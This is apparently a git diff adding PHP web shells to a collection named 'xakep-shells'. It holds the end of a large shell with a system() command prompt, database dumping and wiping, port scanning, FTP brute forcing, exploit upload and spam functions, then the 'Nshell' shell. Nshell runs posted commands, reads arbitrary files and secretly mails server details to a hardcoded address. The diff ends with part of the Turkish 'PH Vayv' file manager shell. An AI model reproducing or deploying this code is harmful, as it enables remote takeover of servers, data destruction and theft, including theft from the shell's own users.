+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/xakep-shells/PHP/Nshell (1).php.php.txt b/xakep-shells/PHP/Nshell (1).php.php.txt
new file mode 100644
index 0000000..1d008b6
--- /dev/null
+++ b/xakep-shells/PHP/Nshell (1).php.php.txt	
@@ -0,0 +1,66 @@
+<?php
+//code by navaro :d
+/***************************************/
+  closelog( );
+/*
+  echo "<center>";
+  $user = get_current_user( ); echo "User :".$user."<br>";
+  $login = posix_getuid( ); echo "Login (Get uid):".$login."<br>";
+  $euid = posix_geteuid( ); echo "Get Euid (geteuid):".$euid."<br>";
+  $ver = phpversion( ); echo "Php version (phpversion) :".$ver."<br>";
+  $gid = posix_getgid( ); echo "Get id (id) :".$gid."<br>";
+  if ($chdir == "") $chdir = getcwd( ); echo "pwd :".$chdir."<br>";
+  if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
+  echo "</center>";
+
+/***************************************/
+function readfiles()
+{
+echo "<form name=pathfile method=post action=".$_SERVER['REQUEST_URI'].">";
+echo "File name : <br><input size=50 name=file type=text".@$_POST['file']."><br>";
+echo "<input type=submit value=Submit></form><hr color=777777 width=100% height=115px>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
+$file=@$_POST['file'];
+if(!@fopen("$file","r")) { echo "File not found";exit();};
+if(@isset($file))
+{
+$fd = @fopen ("$file", "r");
+echo "<center><font face=\"tahoma\" size=\"12\"><TEXTAREA NAME=\"source\" ROWS=\"35\" COLS=\"120\">";
+while (!@feof ($fd)) {
+   $buffer = @fgets($fd);
+   echo htmlspecialchars($buffer);
+}
+@fclose ($fd);
+echo "</TEXTAREA> </font></center>";
+}
+else echo $_SERVER['PHP_SELF']."?file=";
+}
+// Thuc thi command
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function ecmd()
+{
+echo "<FORM name=injection METHOD=POST ACTION=".$_SERVER['REQUEST_URI'].">";
+echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($_POST['cmd']))."><br> <INPUT TYPE=submit></FORM><hr color=777777 width=100% height=115px></font><pre>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+$cmd = @$_POST['cmd'];
+  if (isset($chdir)) @chdir($chdir);
+  ob_start();
+  system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
+  $output = ob_get_contents();
+  ob_end_clean();
+  if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+exit();
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+echo "</pre>";
+}
+$act=@$_REQUEST['act'];
+if(empty($act))
+{ echo $_SERVER['PHP_SELF']."act=?<br>" ;
+echo "<a href=".$_SERVER['PHP_SELF']."?act=cmd>Command</a><br>";
+echo "<a href=".$_SERVER['PHP_SELF']."?act=readfile>Read file</a>";
+; exit();
+}
+if($act=="cmd") {ecmd();}
+if($act=="readfile") {readfiles();}
+?>
+ 
diff --git a/xakep-shells/PHP/PH Vayv.php.php.txt b/xakep-shells/PHP/PH Vayv.php.php.txt
new file mode 100644
index 0000000..c01e2c7
--- /dev/null
+++ b/xakep-shells/PHP/PH Vayv.php.php.txt	
@@ -0,0 +1,597 @@
+<? if($sistembilgisi > "") {phpinfo();} else { ?>
+
+
+<?$fistik=PHVayv;?>
+
+
+<?if ($sildos>"") {unlink("$dizin/$sildos");} ?>
+
+<?if ($dizin== ""){$dizin=realpath('.');}{$dizin=realpath($dizin);}?>
+
+<?if ($silklas > ""){rmdir($silklas);}?>
+
+<?if ($yeniklasor > "") {mkdir("$dizin/$duzenx2",777);}?>
+
+
+
+<?if ($yenidosya == "1") {
+$baglan=fopen("$dizin/$duzenx2",'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($duzkaydet > "") {
+
+$baglan=fopen($duzkaydet,'w');
+fwrite($baglan,$duzenx);
+fclose($baglan);}
+?>
+
+
+
+
+<?if ($yenklas>"") {;?>
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klas�r Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Ad�"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullan�c�'"
+                onfocus="if (this.value == 'Kullan�c�') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
